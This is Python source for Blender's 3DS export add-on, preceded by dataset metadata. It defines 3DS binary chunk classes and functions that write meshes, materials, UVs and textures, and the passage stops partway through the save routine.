| 24.380952 | 80 | 0.621094 | 72 | 512 | 4.263889 | 0.638889 | 0.052117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.234375 | 512 | 20 | 81 | 25.6 | 0.772959 | 0.041016 | 0 | 0 | 0 | 0 | 0.171429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7f624ac745e0d1a0db270c7d92980bf34db4dbc | 38,688 | py | Python | blender/2.79/scripts/addons/io_scene_3ds/export_3ds.py | uzairakbar/bpy2.79 | 3a3e0004ac6783c4e4b89d939e4432de99026a85 | [
"MIT"
] | 2 | 2019-11-27T09:05:42.000Z | 2020-02-20T01:25:23.000Z | io_scene_3ds/export_3ds.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | null | null | null | io_scene_3ds/export_3ds.py | 1-MillionParanoidTterabytes/blender-addons-master | acc8fc23a38e6e89099c3e5079bea31ce85da06a | [
"Unlicense"
] | 4 | 2020-02-19T20:02:26.000Z | 2022-02-11T18:47:56.000Z | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
# Script copyright (C) Bob Holcomb
# Contributors: Campbell Barton, Bob Holcomb, Richard Lärkäng, Damien McGinnes, Mark Stijnman
"""
Exporting is based on 3ds loader from www.gametutorials.com(Thanks DigiBen) and using information
from the lib3ds project (http://lib3ds.sourceforge.net/) sourcecode.
"""
######################################################
# Data Structures
######################################################
#Some of the chunks that we will export
#----- Primary Chunk, at the beginning of each file
PRIMARY = 0x4D4D
#------ Main Chunks
OBJECTINFO = 0x3D3D # This gives the version of the mesh and is found right before the material and object information
VERSION = 0x0002 # This gives the version of the .3ds file
KFDATA = 0xB000 # This is the header for all of the key frame info
#------ sub defines of OBJECTINFO
MATERIAL = 45055 # 0xAFFF // This stored the texture info
OBJECT = 16384 # 0x4000 // This stores the faces, vertices, etc...
#>------ sub defines of MATERIAL
MATNAME = 0xA000 # This holds the material name
MATAMBIENT = 0xA010 # Ambient color of the object/material
MATDIFFUSE = 0xA020 # This holds the color of the object/material
MATSPECULAR = 0xA030 # SPecular color of the object/material
MATSHINESS = 0xA040 # ??
MAT_DIFFUSEMAP = 0xA200 # This is a header for a new diffuse texture
MAT_OPACMAP = 0xA210 # head for opacity map
MAT_BUMPMAP = 0xA230 # read for normal map
MAT_SPECMAP = 0xA204 # read for specularity map
#>------ sub defines of MAT_???MAP
MATMAPFILE = 0xA300 # This holds the file name of a texture
MAT_MAP_TILING = 0xa351 # 2nd bit (from LSB) is mirror UV flag
MAT_MAP_USCALE = 0xA354 # U axis scaling
MAT_MAP_VSCALE = 0xA356 # V axis scaling
MAT_MAP_UOFFSET = 0xA358 # U axis offset
MAT_MAP_VOFFSET = 0xA35A # V axis offset
MAT_MAP_ANG = 0xA35C # UV rotation around the z-axis in rad
RGB1 = 0x0011
RGB2 = 0x0012
#>------ sub defines of OBJECT
OBJECT_MESH = 0x4100 # This lets us know that we are reading a new object
OBJECT_LIGHT = 0x4600 # This lets un know we are reading a light object
OBJECT_CAMERA = 0x4700 # This lets un know we are reading a camera object
#>------ sub defines of CAMERA
OBJECT_CAM_RANGES = 0x4720 # The camera range values
#>------ sub defines of OBJECT_MESH
OBJECT_VERTICES = 0x4110 # The objects vertices
OBJECT_FACES = 0x4120 # The objects faces
OBJECT_MATERIAL = 0x4130 # This is found if the object has a material, either texture map or color
OBJECT_UV = 0x4140 # The UV texture coordinates
OBJECT_TRANS_MATRIX = 0x4160 # The Object Matrix
#>------ sub defines of KFDATA
KFDATA_KFHDR = 0xB00A
KFDATA_KFSEG = 0xB008
KFDATA_KFCURTIME = 0xB009
KFDATA_OBJECT_NODE_TAG = 0xB002
#>------ sub defines of OBJECT_NODE_TAG
OBJECT_NODE_ID = 0xB030
OBJECT_NODE_HDR = 0xB010
OBJECT_PIVOT = 0xB013
OBJECT_INSTANCE_NAME = 0xB011
POS_TRACK_TAG = 0xB020
ROT_TRACK_TAG = 0xB021
SCL_TRACK_TAG = 0xB022
import struct
# So 3ds max can open files, limit names to 12 in length
# this is verry annoying for filenames!
name_unique = [] # stores str, ascii only
name_mapping = {} # stores {orig: byte} mapping
def sane_name(name):
name_fixed = name_mapping.get(name)
if name_fixed is not None:
return name_fixed
# strip non ascii chars
new_name_clean = new_name = name.encode("ASCII", "replace").decode("ASCII")[:12]
i = 0
while new_name in name_unique:
new_name = new_name_clean + ".%.3d" % i
i += 1
# note, appending the 'str' version.
name_unique.append(new_name)
name_mapping[name] = new_name = new_name.encode("ASCII", "replace")
return new_name
def uv_key(uv):
return round(uv[0], 6), round(uv[1], 6)
# size defines:
SZ_SHORT = 2
SZ_INT = 4
SZ_FLOAT = 4
class _3ds_ushort(object):
"""Class representing a short (2-byte integer) for a 3ds file.
*** This looks like an unsigned short H is unsigned from the struct docs - Cam***"""
__slots__ = ("value", )
def __init__(self, val=0):
self.value = val
def get_size(self):
return SZ_SHORT
def write(self, file):
file.write(struct.pack("<H", self.value))
def __str__(self):
return str(self.value)
class _3ds_uint(object):
"""Class representing an int (4-byte integer) for a 3ds file."""
__slots__ = ("value", )
def __init__(self, val):
self.value = val
def get_size(self):
return SZ_INT
def write(self, file):
file.write(struct.pack("<I", self.value))
def __str__(self):
return str(self.value)
class _3ds_float(object):
"""Class representing a 4-byte IEEE floating point number for a 3ds file."""
__slots__ = ("value", )
def __init__(self, val):
self.value = val
def get_size(self):
return SZ_FLOAT
def write(self, file):
file.write(struct.pack("<f", self.value))
def __str__(self):
return str(self.value)
class _3ds_string(object):
"""Class representing a zero-terminated string for a 3ds file."""
__slots__ = ("value", )
def __init__(self, val):
assert(type(val) == bytes)
self.value = val
def get_size(self):
return (len(self.value) + 1)
def write(self, file):
binary_format = "<%ds" % (len(self.value) + 1)
file.write(struct.pack(binary_format, self.value))
def __str__(self):
return self.value
class _3ds_point_3d(object):
"""Class representing a three-dimensional point for a 3ds file."""
__slots__ = "x", "y", "z"
def __init__(self, point):
self.x, self.y, self.z = point
def get_size(self):
return 3 * SZ_FLOAT
def write(self, file):
file.write(struct.pack('<3f', self.x, self.y, self.z))
def __str__(self):
return '(%f, %f, %f)' % (self.x, self.y, self.z)
# Used for writing a track
'''
class _3ds_point_4d(object):
"""Class representing a four-dimensional point for a 3ds file, for instance a quaternion."""
__slots__ = "x","y","z","w"
def __init__(self, point=(0.0,0.0,0.0,0.0)):
self.x, self.y, self.z, self.w = point
def get_size(self):
return 4*SZ_FLOAT
def write(self,file):
data=struct.pack('<4f', self.x, self.y, self.z, self.w)
file.write(data)
def __str__(self):
return '(%f, %f, %f, %f)' % (self.x, self.y, self.z, self.w)
'''
class _3ds_point_uv(object):
"""Class representing a UV-coordinate for a 3ds file."""
__slots__ = ("uv", )
def __init__(self, point):
self.uv = point
def get_size(self):
return 2 * SZ_FLOAT
def write(self, file):
data = struct.pack('<2f', self.uv[0], self.uv[1])
file.write(data)
def __str__(self):
return '(%g, %g)' % self.uv
class _3ds_rgb_color(object):
"""Class representing a (24-bit) rgb color for a 3ds file."""
__slots__ = "r", "g", "b"
def __init__(self, col):
self.r, self.g, self.b = col
def get_size(self):
return 3
def write(self, file):
file.write(struct.pack('<3B', int(255 * self.r), int(255 * self.g), int(255 * self.b)))
def __str__(self):
return '{%f, %f, %f}' % (self.r, self.g, self.b)
class _3ds_face(object):
"""Class representing a face for a 3ds file."""
__slots__ = ("vindex", )
def __init__(self, vindex):
self.vindex = vindex
def get_size(self):
return 4 * SZ_SHORT
# no need to validate every face vert. the oversized array will
# catch this problem
def write(self, file):
# The last zero is only used by 3d studio
file.write(struct.pack("<4H", self.vindex[0], self.vindex[1], self.vindex[2], 0))
def __str__(self):
return "[%d %d %d]" % (self.vindex[0], self.vindex[1], self.vindex[2])
class _3ds_array(object):
"""Class representing an array of variables for a 3ds file.
Consists of a _3ds_ushort to indicate the number of items, followed by the items themselves.
"""
__slots__ = "values", "size"
def __init__(self):
self.values = []
self.size = SZ_SHORT
# add an item:
def add(self, item):
self.values.append(item)
self.size += item.get_size()
def get_size(self):
return self.size
def validate(self):
return len(self.values) <= 65535
def write(self, file):
_3ds_ushort(len(self.values)).write(file)
for value in self.values:
value.write(file)
# To not overwhelm the output in a dump, a _3ds_array only
# outputs the number of items, not all of the actual items.
def __str__(self):
return '(%d items)' % len(self.values)
class _3ds_named_variable(object):
"""Convenience class for named variables."""
__slots__ = "value", "name"
def __init__(self, name, val=None):
self.name = name
self.value = val
def get_size(self):
if self.value is None:
return 0
else:
return self.value.get_size()
def write(self, file):
if self.value is not None:
self.value.write(file)
def dump(self, indent):
if self.value is not None:
print(indent * " ",
self.name if self.name else "[unnamed]",
" = ",
self.value)
#the chunk class
class _3ds_chunk(object):
"""Class representing a chunk in a 3ds file.
Chunks contain zero or more variables, followed by zero or more subchunks.
"""
__slots__ = "ID", "size", "variables", "subchunks"
def __init__(self, chunk_id=0):
self.ID = _3ds_ushort(chunk_id)
self.size = _3ds_uint(0)
self.variables = []
self.subchunks = []
def add_variable(self, name, var):
"""Add a named variable.
The name is mostly for debugging purposes."""
self.variables.append(_3ds_named_variable(name, var))
def add_subchunk(self, chunk):
"""Add a subchunk."""
self.subchunks.append(chunk)
def get_size(self):
"""Calculate the size of the chunk and return it.
The sizes of the variables and subchunks are used to determine this chunk\'s size."""
tmpsize = self.ID.get_size() + self.size.get_size()
for variable in self.variables:
tmpsize += variable.get_size()
for subchunk in self.subchunks:
tmpsize += subchunk.get_size()
self.size.value = tmpsize
return self.size.value
def validate(self):
for var in self.variables:
func = getattr(var.value, "validate", None)
if (func is not None) and not func():
return False
for chunk in self.subchunks:
func = getattr(chunk, "validate", None)
if (func is not None) and not func():
return False
return True
def write(self, file):
"""Write the chunk to a file.
Uses the write function of the variables and the subchunks to do the actual work."""
#write header
self.ID.write(file)
self.size.write(file)
for variable in self.variables:
variable.write(file)
for subchunk in self.subchunks:
subchunk.write(file)
def dump(self, indent=0):
"""Write the chunk to a file.
Dump is used for debugging purposes, to dump the contents of a chunk to the standard output.
Uses the dump function of the named variables and the subchunks to do the actual work."""
print(indent * " ",
"ID=%r" % hex(self.ID.value),
"size=%r" % self.get_size())
for variable in self.variables:
variable.dump(indent + 1)
for subchunk in self.subchunks:
subchunk.dump(indent + 1)
######################################################
# EXPORT
######################################################
def get_material_image_texslots(material):
# blender utility func.
if material:
return [s for s in material.texture_slots if s and s.texture.type == 'IMAGE' and s.texture.image]
return []
"""
images = []
if material:
for mtex in material.getTextures():
if mtex and mtex.tex.type == Blender.Texture.Types.IMAGE:
image = mtex.tex.image
if image:
images.append(image) # maye want to include info like diffuse, spec here.
return images
"""
def make_material_subchunk(chunk_id, color):
"""Make a material subchunk.
Used for color subchunks, such as diffuse color or ambient color subchunks."""
mat_sub = _3ds_chunk(chunk_id)
col1 = _3ds_chunk(RGB1)
col1.add_variable("color1", _3ds_rgb_color(color))
mat_sub.add_subchunk(col1)
# optional:
#col2 = _3ds_chunk(RGB1)
#col2.add_variable("color2", _3ds_rgb_color(color))
#mat_sub.add_subchunk(col2)
return mat_sub
def make_material_texture_chunk(chunk_id, texslots, tess_uv_image=None):
"""Make Material Map texture chunk given a seq. of `MaterialTextureSlot`'s
`tess_uv_image` is optionally used as image source if the slots are
empty. No additional filtering for mapping modes is done, all
slots are written "as is".
"""
mat_sub = _3ds_chunk(chunk_id)
has_entry = False
import bpy
def add_texslot(texslot):
texture = texslot.texture
image = texture.image
filename = bpy.path.basename(image.filepath)
mat_sub_file = _3ds_chunk(MATMAPFILE)
mat_sub_file.add_variable("mapfile", _3ds_string(sane_name(filename)))
mat_sub.add_subchunk(mat_sub_file)
maptile = 0
# no perfect mapping for mirror modes - 3DS only has uniform mirror w. repeat=2
if texture.extension == 'REPEAT' and (texture.use_mirror_x and texture.repeat_x > 1) \
or (texture.use_mirror_y and texture.repeat_y > 1):
maptile |= 0x2
# CLIP maps to 3DS' decal flag
elif texture.extension == 'CLIP':
maptile |= 0x10
mat_sub_tile = _3ds_chunk(MAT_MAP_TILING)
mat_sub_tile.add_variable("maptiling", _3ds_ushort(maptile))
mat_sub.add_subchunk(mat_sub_tile)
mat_sub_uscale = _3ds_chunk(MAT_MAP_USCALE)
mat_sub_uscale.add_variable("mapuscale", _3ds_float(texslot.scale[0]))
mat_sub.add_subchunk(mat_sub_uscale)
mat_sub_vscale = _3ds_chunk(MAT_MAP_VSCALE)
mat_sub_vscale.add_variable("mapuscale", _3ds_float(texslot.scale[1]))
mat_sub.add_subchunk(mat_sub_vscale)
mat_sub_uoffset = _3ds_chunk(MAT_MAP_UOFFSET)
mat_sub_uoffset.add_variable("mapuoffset", _3ds_float(texslot.offset[0]))
mat_sub.add_subchunk(mat_sub_uoffset)
mat_sub_voffset = _3ds_chunk(MAT_MAP_VOFFSET)
mat_sub_voffset.add_variable("mapvoffset", _3ds_float(texslot.offset[1]))
mat_sub.add_subchunk(mat_sub_voffset)
# store all textures for this mapto in order. This at least is what
# the 3DS exporter did so far, afaik most readers will just skip
# over 2nd textures.
for slot in texslots:
add_texslot(slot)
has_entry = True
# image from tess. UV face - basically the code above should handle
# this already. No idea why its here so keep it :-)
if tess_uv_image and not has_entry:
has_entry = True
filename = bpy.path.basename(tess_uv_image.filepath)
mat_sub_file = _3ds_chunk(MATMAPFILE)
mat_sub_file.add_variable("mapfile", _3ds_string(sane_name(filename)))
mat_sub.add_subchunk(mat_sub_file)
return mat_sub if has_entry else None
def make_material_chunk(material, image):
"""Make a material chunk out of a blender material."""
material_chunk = _3ds_chunk(MATERIAL)
name = _3ds_chunk(MATNAME)
name_str = material.name if material else "None"
if image:
name_str += image.name
name.add_variable("name", _3ds_string(sane_name(name_str)))
material_chunk.add_subchunk(name)
if not material:
material_chunk.add_subchunk(make_material_subchunk(MATAMBIENT, (0.0, 0.0, 0.0)))
material_chunk.add_subchunk(make_material_subchunk(MATDIFFUSE, (0.8, 0.8, 0.8)))
material_chunk.add_subchunk(make_material_subchunk(MATSPECULAR, (1.0, 1.0, 1.0)))
else:
material_chunk.add_subchunk(make_material_subchunk(MATAMBIENT, (material.ambient * material.diffuse_color)[:]))
material_chunk.add_subchunk(make_material_subchunk(MATDIFFUSE, material.diffuse_color[:]))
material_chunk.add_subchunk(make_material_subchunk(MATSPECULAR, material.specular_color[:]))
slots = get_material_image_texslots(material) # can be None
if slots:
spec = [s for s in slots if s.use_map_specular or s.use_map_color_spec]
matmap = make_material_texture_chunk(MAT_SPECMAP, spec)
if matmap:
material_chunk.add_subchunk(matmap)
alpha = [s for s in slots if s.use_map_alpha]
matmap = make_material_texture_chunk(MAT_OPACMAP, alpha)
if matmap:
material_chunk.add_subchunk(matmap)
normal = [s for s in slots if s.use_map_normal]
matmap = make_material_texture_chunk(MAT_BUMPMAP, normal)
if matmap:
material_chunk.add_subchunk(matmap)
# make sure no textures are lost. Everything that doesn't fit
# into a channel is exported as diffuse texture with a
# warning.
diffuse = []
for s in slots:
if s.use_map_color_diffuse:
diffuse.append(s)
elif not (s in normal or s in alpha or s in spec):
print('\nwarning: failed to map texture to 3DS map channel, assuming diffuse')
diffuse.append(s)
if diffuse:
matmap = make_material_texture_chunk(MAT_DIFFUSEMAP, diffuse, image)
if matmap:
material_chunk.add_subchunk(matmap)
return material_chunk
class tri_wrapper(object):
"""Class representing a triangle.
Used when converting faces to triangles"""
__slots__ = "vertex_index", "mat", "image", "faceuvs", "offset"
def __init__(self, vindex=(0, 0, 0), mat=None, image=None, faceuvs=None):
self.vertex_index = vindex
self.mat = mat
self.image = image
self.faceuvs = faceuvs
self.offset = [0, 0, 0] # offset indices
def extract_triangles(mesh):
"""Extract triangles from a mesh.
If the mesh contains quads, they will be split into triangles."""
tri_list = []
do_uv = bool(mesh.tessface_uv_textures)
img = None
for i, face in enumerate(mesh.tessfaces):
f_v = face.vertices
uf = mesh.tessface_uv_textures.active.data[i] if do_uv else None
if do_uv:
f_uv = uf.uv
img = uf.image if uf else None
if img is not None:
img = img.name
# if f_v[3] == 0:
if len(f_v) == 3:
new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), face.material_index, img)
if (do_uv):
new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])
tri_list.append(new_tri)
else: # it's a quad
new_tri = tri_wrapper((f_v[0], f_v[1], f_v[2]), face.material_index, img)
new_tri_2 = tri_wrapper((f_v[0], f_v[2], f_v[3]), face.material_index, img)
if (do_uv):
new_tri.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[1]), uv_key(f_uv[2])
new_tri_2.faceuvs = uv_key(f_uv[0]), uv_key(f_uv[2]), uv_key(f_uv[3])
tri_list.append(new_tri)
tri_list.append(new_tri_2)
return tri_list
def remove_face_uv(verts, tri_list):
"""Remove face UV coordinates from a list of triangles.
Since 3ds files only support one pair of uv coordinates for each vertex, face uv coordinates
need to be converted to vertex uv coordinates. That means that vertices need to be duplicated when
there are multiple uv coordinates per vertex."""
# initialize a list of UniqueLists, one per vertex:
#uv_list = [UniqueList() for i in xrange(len(verts))]
unique_uvs = [{} for i in range(len(verts))]
# for each face uv coordinate, add it to the UniqueList of the vertex
for tri in tri_list:
for i in range(3):
# store the index into the UniqueList for future reference:
# offset.append(uv_list[tri.vertex_index[i]].add(_3ds_point_uv(tri.faceuvs[i])))
context_uv_vert = unique_uvs[tri.vertex_index[i]]
uvkey = tri.faceuvs[i]
offset_index__uv_3ds = context_uv_vert.get(uvkey)
if not offset_index__uv_3ds:
offset_index__uv_3ds = context_uv_vert[uvkey] = len(context_uv_vert), _3ds_point_uv(uvkey)
tri.offset[i] = offset_index__uv_3ds[0]
# At this point, each vertex has a UniqueList containing every uv coordinate that is associated with it
# only once.
# Now we need to duplicate every vertex as many times as it has uv coordinates and make sure the
# faces refer to the new face indices:
vert_index = 0
vert_array = _3ds_array()
uv_array = _3ds_array()
index_list = []
for i, vert in enumerate(verts):
index_list.append(vert_index)
pt = _3ds_point_3d(vert.co) # reuse, should be ok
uvmap = [None] * len(unique_uvs[i])
for ii, uv_3ds in unique_uvs[i].values():
# add a vertex duplicate to the vertex_array for every uv associated with this vertex:
vert_array.add(pt)
# add the uv coordinate to the uv array:
# This for loop does not give uv's ordered by ii, so we create a new map
# and add the uv's later
# uv_array.add(uv_3ds)
uvmap[ii] = uv_3ds
# Add the uv's in the correct order
for uv_3ds in uvmap:
# add the uv coordinate to the uv array:
uv_array.add(uv_3ds)
vert_index += len(unique_uvs[i])
# Make sure the triangle vertex indices now refer to the new vertex list:
for tri in tri_list:
for i in range(3):
tri.offset[i] += index_list[tri.vertex_index[i]]
tri.vertex_index = tri.offset
return vert_array, uv_array, tri_list
def make_faces_chunk(tri_list, mesh, materialDict):
"""Make a chunk for the faces.
Also adds subchunks assigning materials to all faces."""
materials = mesh.materials
if not materials:
mat = None
face_chunk = _3ds_chunk(OBJECT_FACES)
face_list = _3ds_array()
if mesh.tessface_uv_textures:
# Gather materials used in this mesh - mat/image pairs
unique_mats = {}
for i, tri in enumerate(tri_list):
face_list.add(_3ds_face(tri.vertex_index))
if materials:
mat = materials[tri.mat]
if mat:
mat = mat.name
img = tri.image
try:
context_mat_face_array = unique_mats[mat, img][1]
except:
name_str = mat if mat else "None"
if img:
name_str += img
context_mat_face_array = _3ds_array()
unique_mats[mat, img] = _3ds_string(sane_name(name_str)), context_mat_face_array
context_mat_face_array.add(_3ds_ushort(i))
# obj_material_faces[tri.mat].add(_3ds_ushort(i))
face_chunk.add_variable("faces", face_list)
for mat_name, mat_faces in unique_mats.values():
obj_material_chunk = _3ds_chunk(OBJECT_MATERIAL)
obj_material_chunk.add_variable("name", mat_name)
obj_material_chunk.add_variable("face_list", mat_faces)
face_chunk.add_subchunk(obj_material_chunk)
else:
obj_material_faces = []
obj_material_names = []
for m in materials:
if m:
obj_material_names.append(_3ds_string(sane_name(m.name)))
obj_material_faces.append(_3ds_array())
n_materials = len(obj_material_names)
for i, tri in enumerate(tri_list):
face_list.add(_3ds_face(tri.vertex_index))
if (tri.mat < n_materials):
obj_material_faces[tri.mat].add(_3ds_ushort(i))
face_chunk.add_variable("faces", face_list)
for i in range(n_materials):
obj_material_chunk = _3ds_chunk(OBJECT_MATERIAL)
obj_material_chunk.add_variable("name", obj_material_names[i])
obj_material_chunk.add_variable("face_list", obj_material_faces[i])
face_chunk.add_subchunk(obj_material_chunk)
return face_chunk
def make_vert_chunk(vert_array):
"""Make a vertex chunk out of an array of vertices."""
vert_chunk = _3ds_chunk(OBJECT_VERTICES)
vert_chunk.add_variable("vertices", vert_array)
return vert_chunk
def make_uv_chunk(uv_array):
"""Make a UV chunk out of an array of UVs."""
uv_chunk = _3ds_chunk(OBJECT_UV)
uv_chunk.add_variable("uv coords", uv_array)
return uv_chunk
def make_matrix_4x3_chunk(matrix):
matrix_chunk = _3ds_chunk(OBJECT_TRANS_MATRIX)
for vec in matrix.col:
for f in vec[:3]:
matrix_chunk.add_variable("matrix_f", _3ds_float(f))
return matrix_chunk
def make_mesh_chunk(mesh, matrix, materialDict):
"""Make a chunk out of a Blender mesh."""
# Extract the triangles from the mesh:
tri_list = extract_triangles(mesh)
if mesh.tessface_uv_textures:
# Remove the face UVs and convert it to vertex UV:
vert_array, uv_array, tri_list = remove_face_uv(mesh.vertices, tri_list)
else:
# Add the vertices to the vertex array:
vert_array = _3ds_array()
for vert in mesh.vertices:
vert_array.add(_3ds_point_3d(vert.co))
# no UV at all:
uv_array = None
# create the chunk:
mesh_chunk = _3ds_chunk(OBJECT_MESH)
# add vertex chunk:
mesh_chunk.add_subchunk(make_vert_chunk(vert_array))
# add faces chunk:
mesh_chunk.add_subchunk(make_faces_chunk(tri_list, mesh, materialDict))
# if available, add uv chunk:
if uv_array:
mesh_chunk.add_subchunk(make_uv_chunk(uv_array))
mesh_chunk.add_subchunk(make_matrix_4x3_chunk(matrix))
return mesh_chunk
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
def make_kfdata(start=0, stop=0, curtime=0):
"""Make the basic keyframe data chunk"""
kfdata = _3ds_chunk(KFDATA)
kfhdr = _3ds_chunk(KFDATA_KFHDR)
kfhdr.add_variable("revision", _3ds_ushort(0))
# Not really sure what filename is used for, but it seems it is usually used
# to identify the program that generated the .3ds:
kfhdr.add_variable("filename", _3ds_string("Blender"))
kfhdr.add_variable("animlen", _3ds_uint(stop-start))
kfseg = _3ds_chunk(KFDATA_KFSEG)
kfseg.add_variable("start", _3ds_uint(start))
kfseg.add_variable("stop", _3ds_uint(stop))
kfcurtime = _3ds_chunk(KFDATA_KFCURTIME)
kfcurtime.add_variable("curtime", _3ds_uint(curtime))
kfdata.add_subchunk(kfhdr)
kfdata.add_subchunk(kfseg)
kfdata.add_subchunk(kfcurtime)
return kfdata
def make_track_chunk(ID, obj):
"""Make a chunk for track data.
Depending on the ID, this will construct a position, rotation or scale track."""
track_chunk = _3ds_chunk(ID)
track_chunk.add_variable("track_flags", _3ds_ushort())
track_chunk.add_variable("unknown", _3ds_uint())
track_chunk.add_variable("unknown", _3ds_uint())
track_chunk.add_variable("nkeys", _3ds_uint(1))
# Next section should be repeated for every keyframe, but for now, animation is not actually supported.
track_chunk.add_variable("tcb_frame", _3ds_uint(0))
track_chunk.add_variable("tcb_flags", _3ds_ushort())
if obj.type=='Empty':
if ID==POS_TRACK_TAG:
# position vector:
track_chunk.add_variable("position", _3ds_point_3d(obj.getLocation()))
elif ID==ROT_TRACK_TAG:
# rotation (quaternion, angle first, followed by axis):
q = obj.getEuler().to_quaternion() # XXX, todo!
track_chunk.add_variable("rotation", _3ds_point_4d((q.angle, q.axis[0], q.axis[1], q.axis[2])))
elif ID==SCL_TRACK_TAG:
# scale vector:
track_chunk.add_variable("scale", _3ds_point_3d(obj.getSize()))
else:
# meshes have their transformations applied before
# exporting, so write identity transforms here:
if ID==POS_TRACK_TAG:
# position vector:
track_chunk.add_variable("position", _3ds_point_3d((0.0,0.0,0.0)))
elif ID==ROT_TRACK_TAG:
# rotation (quaternion, angle first, followed by axis):
track_chunk.add_variable("rotation", _3ds_point_4d((0.0, 1.0, 0.0, 0.0)))
elif ID==SCL_TRACK_TAG:
# scale vector:
track_chunk.add_variable("scale", _3ds_point_3d((1.0, 1.0, 1.0)))
return track_chunk
def make_kf_obj_node(obj, name_to_id):
"""Make a node chunk for a Blender object.
Takes the Blender object as a parameter. Object id's are taken from the dictionary name_to_id.
Blender Empty objects are converted to dummy nodes."""
name = obj.name
# main object node chunk:
kf_obj_node = _3ds_chunk(KFDATA_OBJECT_NODE_TAG)
# chunk for the object id:
obj_id_chunk = _3ds_chunk(OBJECT_NODE_ID)
# object id is from the name_to_id dictionary:
obj_id_chunk.add_variable("node_id", _3ds_ushort(name_to_id[name]))
# object node header:
obj_node_header_chunk = _3ds_chunk(OBJECT_NODE_HDR)
# object name:
if obj.type == 'Empty':
# Empties are called "$$$DUMMY" and use the OBJECT_INSTANCE_NAME chunk
# for their name (see below):
obj_node_header_chunk.add_variable("name", _3ds_string("$$$DUMMY"))
else:
# Add the name:
obj_node_header_chunk.add_variable("name", _3ds_string(sane_name(name)))
# Add Flag variables (not sure what they do):
obj_node_header_chunk.add_variable("flags1", _3ds_ushort(0))
obj_node_header_chunk.add_variable("flags2", _3ds_ushort(0))
# Check parent-child relationships:
parent = obj.parent
if (parent is None) or (parent.name not in name_to_id):
# If no parent, or the parents name is not in the name_to_id dictionary,
# parent id becomes -1:
obj_node_header_chunk.add_variable("parent", _3ds_ushort(-1))
else:
# Get the parent's id from the name_to_id dictionary:
obj_node_header_chunk.add_variable("parent", _3ds_ushort(name_to_id[parent.name]))
# Add pivot chunk:
obj_pivot_chunk = _3ds_chunk(OBJECT_PIVOT)
obj_pivot_chunk.add_variable("pivot", _3ds_point_3d(obj.getLocation()))
kf_obj_node.add_subchunk(obj_pivot_chunk)
# add subchunks for object id and node header:
kf_obj_node.add_subchunk(obj_id_chunk)
kf_obj_node.add_subchunk(obj_node_header_chunk)
# Empty objects need to have an extra chunk for the instance name:
if obj.type == 'Empty':
obj_instance_name_chunk = _3ds_chunk(OBJECT_INSTANCE_NAME)
obj_instance_name_chunk.add_variable("name", _3ds_string(sane_name(name)))
kf_obj_node.add_subchunk(obj_instance_name_chunk)
# Add track chunks for position, rotation and scale:
kf_obj_node.add_subchunk(make_track_chunk(POS_TRACK_TAG, obj))
kf_obj_node.add_subchunk(make_track_chunk(ROT_TRACK_TAG, obj))
kf_obj_node.add_subchunk(make_track_chunk(SCL_TRACK_TAG, obj))
return kf_obj_node
'''
def save(operator,
context, filepath="",
use_selection=True,
global_matrix=None,
):
import bpy
import mathutils
import time
from bpy_extras.io_utils import create_derived_objects, free_derived_objects
"""Save the Blender scene to a 3ds file."""
# Time the export
time1 = time.clock()
#Blender.Window.WaitCursor(1)
if global_matrix is None:
global_matrix = mathutils.Matrix()
if bpy.ops.object.mode_set.poll():
bpy.ops.object.mode_set(mode='OBJECT')
# Initialize the main chunk (primary):
primary = _3ds_chunk(PRIMARY)
# Add version chunk:
version_chunk = _3ds_chunk(VERSION)
version_chunk.add_variable("version", _3ds_uint(3))
primary.add_subchunk(version_chunk)
# init main object info chunk:
object_info = _3ds_chunk(OBJECTINFO)
''' # COMMENTED OUT FOR 2.42 RELEASE!! CRASHES 3DS MAX
# init main key frame data chunk:
kfdata = make_kfdata()
'''
# Make a list of all materials used in the selected meshes (use a dictionary,
# each material is added once):
materialDict = {}
mesh_objects = []
scene = context.scene
if use_selection:
objects = (ob for ob in scene.objects if ob.is_visible(scene) and ob.select)
else:
objects = (ob for ob in scene.objects if ob.is_visible(scene))
for ob in objects:
# get derived objects
free, derived = create_derived_objects(scene, ob)
if derived is None:
continue
for ob_derived, mat in derived:
if ob.type not in {'MESH', 'CURVE', 'SURFACE', 'FONT', 'META'}:
continue
try:
data = ob_derived.to_mesh(scene, True, 'PREVIEW')
except:
data = None
if data:
matrix = global_matrix * mat
data.transform(matrix)
mesh_objects.append((ob_derived, data, matrix))
mat_ls = data.materials
mat_ls_len = len(mat_ls)
# get material/image tuples.
if data.tessface_uv_textures:
if not mat_ls:
mat = mat_name = None
for f, uf in zip(data.tessfaces, data.tessface_uv_textures.active.data):
if mat_ls:
mat_index = f.material_index
if mat_index >= mat_ls_len:
mat_index = f.mat = 0
mat = mat_ls[mat_index]
mat_name = None if mat is None else mat.name
# else there already set to none
img = uf.image
img_name = None if img is None else img.name
materialDict.setdefault((mat_name, img_name), (mat, img))
else:
for mat in mat_ls:
if mat: # material may be None so check its not.
materialDict.setdefault((mat.name, None), (mat, None))
# Why 0 Why!
for f in data.tessfaces:
if f.material_index >= mat_ls_len:
f.material_index = 0
if free:
free_derived_objects(ob)
